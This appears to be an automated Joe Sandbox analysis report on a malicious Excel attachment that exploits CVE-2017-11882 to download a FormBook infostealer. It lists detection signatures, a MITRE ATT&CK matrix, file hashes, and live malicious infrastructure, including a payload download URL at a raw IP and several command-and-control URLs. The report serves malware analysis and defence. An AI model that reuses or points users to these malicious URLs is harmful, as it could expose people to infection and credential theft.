Source: C:\Windows\SysWOW64\cmd.exe	Code function: _wcsicmp,GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetUserObjectInformationW,memmove,GetLocaleInfoW,GetTimeFormatW,	7_2_4A73D701
Source: C:\Windows\SysWOW64\cmd.exe	Code function: GetDateFormatW,realloc,GetDateFormatW,_wcsicmp,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,memmove,GetSystemTime,SystemTimeToFileTime,memmove,GetLastError,realloc,	7_2_4A74270D
Source: C:\Windows\SysWOW64\cmd.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,	7_2_4A7388D9

Source: C:\Users\Public\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Code function: 7_2_4A744E44 GetSystemTime,SystemTimeToFileTime,

7_2_4A744E44

Source: C:\Windows\SysWOW64\cmd.exe

Code function: 7_2_4A73D3B3 GetVersion,

7_2_4A73D3B3

Stealing of Sensitive Information:

Yara detected FormBook

Show sources

Source: Yara match	File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.3354b60.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.330a940.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.684319508.0000000000190000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.540691245.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.508839358.0000000007FF5000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.478550746.00000000031E9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.684245712.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.540662107.00000000003D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.500540075.0000000007FF5000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.684466431.00000000005A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.540476989.0000000000080000.00000040.00020000.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.3354b60.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.330a940.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.684319508.0000000000190000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.540691245.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.508839358.0000000007FF5000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.478550746.00000000031E9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.684245712.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.540662107.00000000003D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.500540075.0000000007FF5000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.684466431.00000000005A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.540476989.0000000000080000.00000040.00020000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Native API1	Path Interception	Process Injection612	Masquerading111	OS Credential Dumping	System Time Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Shared Modules1	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Disable or Modify Tools11	LSASS Memory	Security Software Discovery231	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Ingress Tool Transfer14	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Exploitation for Client Execution13	Logon Script (Windows)	Logon Script (Windows)	Virtualization/Sandbox Evasion31	Security Account Manager	Process Discovery2	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Process Injection612	NTDS	Virtualization/Sandbox Evasion31	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol123	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Deobfuscate/Decode Files or Information1	LSA Secrets	Remote System Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Obfuscated Files or Information4	Cached Domain Credentials	File and Directory Discovery2	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Software Packing13	DCSync	System Information Discovery126	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
OCT 13 2021 - PRINT COPY.xlsx	24%	ReversingLabs	Document-OLE.Exploit.CVE-2017-11882

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
5.2.vbc.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen		Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://wellformedweb.org/CommentAPI/	0%	URL Reputation	safe
http://18.197.254.181/www1/deo.exe	100%	Avira URL Cloud	malware
http://www.iis.fhg.de/audioPA	0%	URL Reputation	safe
http://www.publicationsplace.com/ef6c/?pVE8Yvg8=69obzrOt3jvlXYYQLOBGpgM4gb/C38tuSyxXcmdwhPVCiSErrrcVtL+HOCZM5DtjL+Sksg==&OHT=xjWx_NuP96LhBV	0%	Avira URL Cloud	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://treyresearch.net	0%	URL Reputation	safe
http://www.collada.org/2005/11/COLLADASchema9Done	0%	URL Reputation	safe
http://java.sun.com	0%	Avira URL Cloud	safe
www.fis.photos/ef6c/	100%	Avira URL Cloud	malware
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://www.upinmyfeels.com/ef6c/?pVE8Yvg8=qu0EmkGaX3geOx6lIkkYY+FXQg5rkMbAIJtI6DFSABpZ5nF28boqJyWYwUc9r+BjHdgUhg==&OHT=xjWx_NuP96LhBV	100%	Avira URL Cloud	malware
http://www.lacucinadesign.com/ef6c/?OHT=xjWx_NuP96LhBV&pVE8Yvg8=9TcXST3pnWOFoH1gaAmWVPk3OXoAybXjykt4lIGhEDNMUFCSIfL5p15n/WQr7vtpGgJ17Q==	0%	Avira URL Cloud	safe
http://computername/printers/printername/.printer	0%	Avira URL Cloud	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.ahljsm.com/ef6c/?OHT=xjWx_NuP96LhBV&pVE8Yvg8=IVc4rtgLgg2h/YWyhQBU9em9uNea1MXNkTy/UnYOuL+WBS8ayE+K1FYcvarTJ+yNk0kAEg==	0%	Avira URL Cloud	safe
http://www.restaurant-utopia.xyz/ef6c/?pVE8Yvg8=QQd8BU9Cv5cEIYl4k4pKDxcRFm34j4nz3hSoRKYyqec7FRTFu3B5N6xNIoSikzbYbjb12w==&OHT=xjWx_NuP96LhBV	100%	Avira URL Cloud	phishing
http://servername/isapibackend.dll	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
www.restaurant-utopia.xyz	172.67.213.229	true	true	unknown
emailforts.com	108.170.14.102	true	true	unknown
lacucinadesign.com	34.102.136.180	true	false	unknown
upinmyfeels.com	34.102.136.180	true	false	unknown
www.ahljsm.com	45.39.212.162	true	true	unknown
www.upinmyfeels.com	unknown	unknown	true	unknown
www.dbe648.com	unknown	unknown	true	unknown
www.publicationsplace.com	unknown	unknown	true	unknown
www.lacucinadesign.com	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://18.197.254.181/www1/deo.exe	true	Avira URL Cloud: malware	unknown
http://www.publicationsplace.com/ef6c/?pVE8Yvg8=69obzrOt3jvlXYYQLOBGpgM4gb/C38tuSyxXcmdwhPVCiSErrrcVtL+HOCZM5DtjL+Sksg==&OHT=xjWx_NuP96LhBV	true	Avira URL Cloud: safe	unknown
www.fis.photos/ef6c/	true	Avira URL Cloud: malware	low
http://www.upinmyfeels.com/ef6c/?pVE8Yvg8=qu0EmkGaX3geOx6lIkkYY+FXQg5rkMbAIJtI6DFSABpZ5nF28boqJyWYwUc9r+BjHdgUhg==&OHT=xjWx_NuP96LhBV	false	Avira URL Cloud: malware	unknown
http://www.lacucinadesign.com/ef6c/?OHT=xjWx_NuP96LhBV&pVE8Yvg8=9TcXST3pnWOFoH1gaAmWVPk3OXoAybXjykt4lIGhEDNMUFCSIfL5p15n/WQr7vtpGgJ17Q==	false	Avira URL Cloud: safe	unknown
http://www.ahljsm.com/ef6c/?OHT=xjWx_NuP96LhBV&pVE8Yvg8=IVc4rtgLgg2h/YWyhQBU9em9uNea1MXNkTy/UnYOuL+WBS8ayE+K1FYcvarTJ+yNk0kAEg==	true	Avira URL Cloud: safe	unknown
http://www.restaurant-utopia.xyz/ef6c/?pVE8Yvg8=QQd8BU9Cv5cEIYl4k4pKDxcRFm34j4nz3hSoRKYyqec7FRTFu3B5N6xNIoSikzbYbjb12w==&OHT=xjWx_NuP96LhBV	true	Avira URL Cloud: phishing	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.windows.com/pctv.	explorer.exe, 00000006.00000000.495770768.0000000002AE0000.00000002.00020000.sdmp	false		high
http://investor.msn.com	explorer.exe, 00000006.00000000.495770768.0000000002AE0000.00000002.00020000.sdmp	false		high
http://www.msnbc.com/news/ticker.txt	explorer.exe, 00000006.00000000.495770768.0000000002AE0000.00000002.00020000.sdmp	false		high
http://wellformedweb.org/CommentAPI/	explorer.exe, 00000006.00000000.529921380.0000000004650000.00000002.00020000.sdmp	false	URL Reputation: safe	unknown
http://www.iis.fhg.de/audioPA	explorer.exe, 00000006.00000000.529921380.0000000004650000.00000002.00020000.sdmp	false	URL Reputation: safe	unknown
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	explorer.exe, 00000006.00000000.484239269.0000000002CC7000.00000002.00020000.sdmp	false	URL Reputation: safe	unknown
http://www.hotmail.com/oe	explorer.exe, 00000006.00000000.495770768.0000000002AE0000.00000002.00020000.sdmp	false		high
http://treyresearch.net	explorer.exe, 00000006.00000000.529921380.0000000004650000.00000002.00020000.sdmp	false	URL Reputation: safe	unknown
http://www.collada.org/2005/11/COLLADASchema9Done	vbc.exe, 00000004.00000002.478433706.00000000021E1000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleaner	explorer.exe, 00000006.00000000.492983646.00000000083C8000.00000004.00000001.sdmp	false		high
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check	explorer.exe, 00000006.00000000.484239269.0000000002CC7000.00000002.00020000.sdmp	false		high
http://java.sun.com	explorer.exe, 00000006.00000000.494338414.0000000000255000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://www.icra.org/vocabulary/.	explorer.exe, 00000006.00000000.484239269.0000000002CC7000.00000002.00020000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.	explorer.exe, 00000006.00000000.494645259.0000000001BE0000.00000002.00020000.sdmp	false		high
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv	explorer.exe, 00000006.00000000.498293005.000000000447A000.00000004.00000001.sdmp	false		high
http://investor.msn.com/	explorer.exe, 00000006.00000000.495770768.0000000002AE0000.00000002.00020000.sdmp	false		high
http://www.piriform.com/ccleaner	explorer.exe, 00000006.00000000.498293005.000000000447A000.00000004.00000001.sdmp	false		high
http://computername/printers/printername/.printer	explorer.exe, 00000006.00000000.529921380.0000000004650000.00000002.00020000.sdmp	false	Avira URL Cloud: safe	low
http://www.%s.comPA	explorer.exe, 00000006.00000000.494645259.0000000001BE0000.00000002.00020000.sdmp	false	URL Reputation: safe	low
http://www.autoitscript.com/autoit3	explorer.exe, 00000006.00000000.494338414.0000000000255000.00000004.00000020.sdmp	false		high
https://support.mozilla.org	explorer.exe, 00000006.00000000.494338414.0000000000255000.00000004.00000020.sdmp	false		high
http://servername/isapibackend.dll	explorer.exe, 00000006.00000000.505593565.0000000003E50000.00000002.00020000.sdmp, cmd.exe, 00000007.00000002.684965488.0000000001D50000.00000002.00020000.sdmp	false	Avira URL Cloud: safe	low

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
108.170.14.102	emailforts.com	United States	20454	SSASN2US	true
34.102.136.180	lacucinadesign.com	United States	15169	GOOGLEUS	false
18.197.254.181	unknown	United States	16509	AMAZON-02US	false
45.39.212.162	www.ahljsm.com	United States	18779	EGIHOSTINGUS	true

Private

IP
192.168.2.22
192.168.2.255

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	502343
Start date:	13.10.2021
Start time:	20:14:33
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 11m 53s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	OCT 13 2021 - PRINT COPY.xlsx
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	11
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.expl.evad.winXLSX@9/13@6/6
EGA Information:	Failed
HDC Information:	Successful, ratio: 19.7% (good quality ratio 19.2%) Quality average: 73.6% Quality standard deviation: 27.4%
HCA Information:	Successful, ratio: 95% Number of executed functions: 79 Number of non-executed functions: 166
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xlsx Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, svchost.exe Not all processes where analyzed, report is missing behavior information Report size getting too big, too many NtCreateFile calls found. Report size getting too big, too many NtEnumerateValueKey calls found. Report size getting too big, too many NtQueryAttributesFile calls found. VT rate limit hit for: /opt/package/joesandbox/database/analysis/502343/sample/OCT 13 2021 - PRINT COPY.xlsx

Simulations

Behavior and APIs

Time	Type	Description
20:15:46	API Interceptor	42x Sleep call for process: EQNEDT32.EXE modified
20:15:48	API Interceptor	99x Sleep call for process: vbc.exe modified
20:16:22	API Interceptor	212x Sleep call for process: cmd.exe modified
20:17:01	API Interceptor	1x Sleep call for process: explorer.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
108.170.14.102	kal88CSImD.exe	Get hash	malicious	Browse	www.publicationsplace.com/ef6c/?FPUd=69obzrOo3kvhXIUcJOBGpgM4gb/C38tuSypHAlBxlvVDijots7NZ7PGFNkVKyy5oeYmT&vT=0TtH8ZZPwPr4v8R
108.170.14.102	qZfsUMa6Jh.exe	Get hash	malicious	Browse	www.publicationsplace.com/ef6c/?s4=69obzrOo3kvhXIUcJOBGpgM4gb/C38tuSypHAlBxlvVDijots7NZ7PGFNkZKhi1rHImF1WMfww==&RpQHH4=Hxlpd
45.39.212.162	1taaCpMNKr.exe	Get hash	malicious	Browse	www.ahljsm.com/ef6c/?BHzdSbC=IVc4rtgOgn2l/Ia+jQBU9em9uNea1MXNkTqvIkEPqr+XBjQc1UvGjBges/HFNu2+v35w&XDK=DTqxPBg
	p83BktbXwe.exe	Get hash	malicious	Browse	www.ahljsm.com/ef6c/?j0Dxf4=ilHXd&YFQLD6=IVc4rtgOgn2l/Ia+jQBU9em9uNea1MXNkTqvIkEPqr+XBjQc1UvGjBges8rsOuKGmUMmdUdlcQ==
	qZfsUMa6Jh.exe	Get hash	malicious	Browse	www.ahljsm.com/ef6c/?s4=IVc4rtgOgn2l/Ia+jQBU9em9uNea1MXNkTqvIkEPqr+XBjQc1UvGjBges8rVRfqFoCQhdUdiPg==&y8=6lrLUjiXor8xt
	pdrAizaO1R.exe	Get hash	malicious	Browse	www.ahljsm.com/ef6c/?9rQxK=IVc4rtgOgn2l/Ia+jQBU9em9uNea1MXNkTqvIkEPqr+XBjQc1UvGjBges8rVRfqFoCQhdUdiPg==&w4z=Wnyl

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
www.restaurant-utopia.xyz	HUuKj0kt3z.exe	Get hash	malicious	Browse	172.67.213.229
www.restaurant-utopia.xyz	zMO1n8NAdk.exe	Get hash	malicious	Browse	104.21.35.47
www.ahljsm.com	1taaCpMNKr.exe	Get hash	malicious	Browse	45.39.212.162
	p83BktbXwe.exe	Get hash	malicious	Browse	45.39.212.162
	4ZfdpLEQn1.exe	Get hash	malicious	Browse	45.39.212.162
	qZfsUMa6Jh.exe	Get hash	malicious	Browse	45.39.212.162
	pdrAizaO1R.exe	Get hash	malicious	Browse	45.39.212.162
emailforts.com	kal88CSImD.exe	Get hash	malicious	Browse	108.170.14.102
emailforts.com	qZfsUMa6Jh.exe	Get hash	malicious	Browse	108.170.14.102

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
SSASN2US	kal88CSImD.exe	Get hash	malicious	Browse	108.170.14.102
	PO 4500151298.xlsx	Get hash	malicious	Browse	131.153.37.3
	Dylan#75658241.html	Get hash	malicious	Browse	69.160.44.101
	qZfsUMa6Jh.exe	Get hash	malicious	Browse	108.170.14.102
	2GQL8eREln.exe	Get hash	malicious	Browse	131.153.142.106
	SOA.exe	Get hash	malicious	Browse	198.15.70.42
	QUOTATION.xlsx	Get hash	malicious	Browse	131.153.37.3
	UwJpeFp2qK	Get hash	malicious	Browse	66.85.168.27
	leakdetails.xlsx	Get hash	malicious	Browse	131.153.37.3
	k511cDa8ud	Get hash	malicious	Browse	198.15.85.46
	bot.x86	Get hash	malicious	Browse	131.153.142.106
	sora.x86	Get hash	malicious	Browse	184.95.63.66
	peach.arm	Get hash	malicious	Browse	192.34.99.31
	U14s4IbToI.exe	Get hash	malicious	Browse	198.24.151.139
	uYtea.x86	Get hash	malicious	Browse	198.15.115.185
	Swift Copy.xlsx	Get hash	malicious	Browse	131.153.37.3
	1wKONPeBx1.exe	Get hash	malicious	Browse	184.164.143.218
	y1FOl1vVPA.exe	Get hash	malicious	Browse	184.164.136.210
	EVC5DDtdso.exe	Get hash	malicious	Browse	184.164.136.210
	PFm5r5Zeb4.exe	Get hash	malicious	Browse	184.95.45.242

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\deo[1].exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	downloaded
Size (bytes):	474112
Entropy (8bit):	7.47098319943845
Encrypted:	false
SSDEEP:	6144:zMkhBsNolyfnZle9UX08PF85KQ4O1LkyUCZ2e12XZ0bp2Qo7lYB:oSBblyfnZlW+08+5KQpyy52nZ0vo7a
MD5:	6429AA83E4BC083B4F0B3F44B0D7950F
SHA1:	0EAD59881F054284F611ACCB61451ED1FFC818FC
SHA-256:	96C57AE661562E958E01BB0B490C09A0A51BB367931620223174963DE88BDFCB
SHA-512:	186383701C591DB2C011C8AE24920759C10880068DD217E32110AE54B9C7F0863B7FB04E893F601A234742DEB5838A22820DC8835BA9198D66B7BB297D502F9B
Malicious:	true
Reputation:	low
IE Cache URL:	http://18.197.254.181/www1/deo.exe
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....fa..............0.................. ........@.. ....................................@.................................L...O.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc...............:..............@..B........................H.......Lb..pO......Y....................................................0..V.........}.......s....}......}......}.....(.......(......{....r...po......{....r...po.....*...0.............(....&.{.........,....8....sA...%.{.....\|....(....Z.{.....\|....(....Z . &.s....} ...%.}......{ ...(.........(....o........+c...+C.....X.].......,+..(.......{....Z...{....Z.{.....{....o ........X.....\|....(..........-....X.....\|....(..........-......,...o!.....sB........\|....(.....\|....(....s"

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1456B9B2.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 1295 x 471, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	68702
Entropy (8bit):	7.960564589117156
Encrypted:	false
SSDEEP:	1536:Hu2p9Cy+445sz12HnOFIr0Z7gK8mhVgSKe/6mLsw:O2p9w1HCIOTKEhQw
MD5:	9B8C6AB5CD2CC1A2622CC4BB10D745C0
SHA1:	E3C68E3F16AE0A3544720238440EDCE12DFC900E
SHA-256:	AA5A55A415946466C1D1468A6349169D03A0C157A228B4A6C1C85BFD95506FE0
SHA-512:	407F29E5F0C2F993051E4B0C81BF76899C2708A97B6DF4E84246D6A2034B6AFE40B696853742B7E38B7BBE7815FCCCC396A3764EE8B1E6CFB2F2EF399E8FC715
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	.PNG........IHDR.....................pHYs..........+......tIME......&...T....tEXtAuthor....H....tEXtDescription...!#....tEXtCopyright....:....tEXtCreation time.5.......tEXtSoftware.]p.:....tEXtDisclaimer.........tEXtWarning........tEXtSource.........tEXtComment........tEXtTitle....'.. .IDATx...y\|T.?..l..3. .$.D..(v....Q.q.....W.[...Z..-.Hlmm...4V..BU..V@,h.t.....}...cr.3.......B3s.....\|.}.G6j.t.Qv..-Q9...r\"""""""".H9...Y...v...........7........Q..^t{P..C..""""""""".e..n@7B.{Q.S.HDDDDDDDD...........\bxHDDDDDDDDD.1<$""""""""......d2Y@9`@c.v..8P...0`..a\|.....<... ..+...[""""""""".....~..,........+.t..._..o.....8z.$ ..U.Mp".....Z8.a;.B..'...y..I^......e........,}.+.M..K...M...A.7.Z[[.E.....B...nF.:5.."""""""".(.....d.3*..E.=...[o...o.....n..._.{..-..M.3....px(.5..4lt..&....d.R!.......!.$''.n.....X,..__ar.d..0 .M#"""""""..S...T...Ai.8P^XX(..d.....u[.f...8........[`...q..9R../.....v.b.5.r`.[.A..a.....a6......S.o.h7...........g..v..+.~.oB.H..\|..8...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\29DF0F06.emf Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	498420
Entropy (8bit):	0.641342870106216
Encrypted:	false
SSDEEP:	384:4nXXwBkNWZ3cJuUvmWnTG+W4DH8ddxzsFfW3:WXwBkNWZ3cjvmWa+VDO
MD5:	EA7DE15A61A687151A4B7E9DD401753A
SHA1:	701B40B67B793F214E4231EB705D0DC83FD089A5
SHA-256:	C05DA95D7E8148582322F3AA161B26FD43EC89A1ED2AD32830DA37FCAD3F70D4
SHA-512:	7B7A52464E67FFBA118D89E99C998FF1C510B591F20A34EBB09BA91E882E57CF855E5D8006C5E27DAB31E08E0D3A330852CA37B829581155A60063C83D44B86A
Malicious:	false
Reputation:	low
Preview:	....l...............2...........m>..C... EMF........&...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i......................................................[$.....W..f.[.@..%.....W...W.....l.W...W.RQ.\l.W.d.W.......W.P.W.$Q.\l.W.d.W. ...Id.[d.W.l.W. ............d.[........................................%...X...%...7...................{$..................C.a.l.i.b.r.i.............W.X...d.W...W..8.[........dv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@....2.......L.......................P... ..L6...F....F...F..EMF+@..$..........?...........?.........@...........@..........@..$..........?....

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3505F490.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 737 x 456, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	83904
Entropy (8bit):	7.986000888791215
Encrypted:	false
SSDEEP:	1536:xNzYthYR7Iu3TjzBH8lXtvmNy2k8KYpNNNQ64nBLEMoknbRVmnN6:xNzUGxDjeOs2kSNSBh24
MD5:	9F9A7311810407794A153B7C74AED720
SHA1:	EDEE8AE29407870DB468F9B23D8C171FBB0AE41C
SHA-256:	000586368A635172F65B169B41B993F69B5C3181372862258DFAD6F9449F16CD
SHA-512:	27FC1C21B8CB81607E28A55A32ED895DF16943E9D044C80BEC96C90D6D805999D4E2E5D4EFDE2AA06DB0F46805900B4F75DFC69B58614143EBF27908B79DDA42
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	.PNG........IHDR.............oi......IDATx..u\|........@ .@..[.H.5...<....R.8.P...b-....[.!...M..1{on.MB.@...{........r..9s.QTUE".H$..$.a._.@".H$..$...".H$..$;"e..D".H$..).H$..D".H.E".H$.IvD.(..D".H.#RF.H$..D...2.D".H$..Q$..D".dG..".H$..$;"e..D".H$..).H$..D".H.E".H$.IvD.(..D".H.#RF.H$..D...... y.P....D".H..TU}..RF..jRRR...A.1y..Eyj..d$Ne.U..x..f...,.3.......^.m.ga<r...Q..Y..&....43\|A...~...b...l..&........d../C..... ...sN....;.IFXX<..F.z$..D".dG..E..1.fR.%..= 6((W..5.m....YsM.!.....v..r.....\Y..h.N.M.v....{.%...........gb&.<..7/..).X..(\.......0k......k.d2..KI;...O.X..]j.G..BB(U..........`.zU@=t$...S........N...6..a`..t...z.v:.....M......YUe.N....TI...]NQ.<..vm....o....\|yt:......P..d.]....bE.zr.....UJ.y.b....5...gg..?..;pr..V-..U.66.h...Y.......q_t:.."M..x.7...4Y...aa.@qw.I..=.sgC.....pa.!O.Q.....%.f..P..~.uk...8.......-R....5m.I..S.BCC....9r...O.<8u....Q$..E!).`.6.7V.k+WF^...y...p......5.......\)~Y.7m....../.P._^.0W@.....[....<.R..

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5C66BA87.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
Category:	dropped
Size (bytes):	85020
Entropy (8bit):	7.2472785111025875
Encrypted:	false
SSDEEP:	768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
MD5:	738BDB90A9D8929A5FB2D06775F3336F
SHA1:	6A92C54218BFBEF83371E825D6B68D4F896C0DCE
SHA-256:	8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
SHA-512:	48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
Malicious:	false
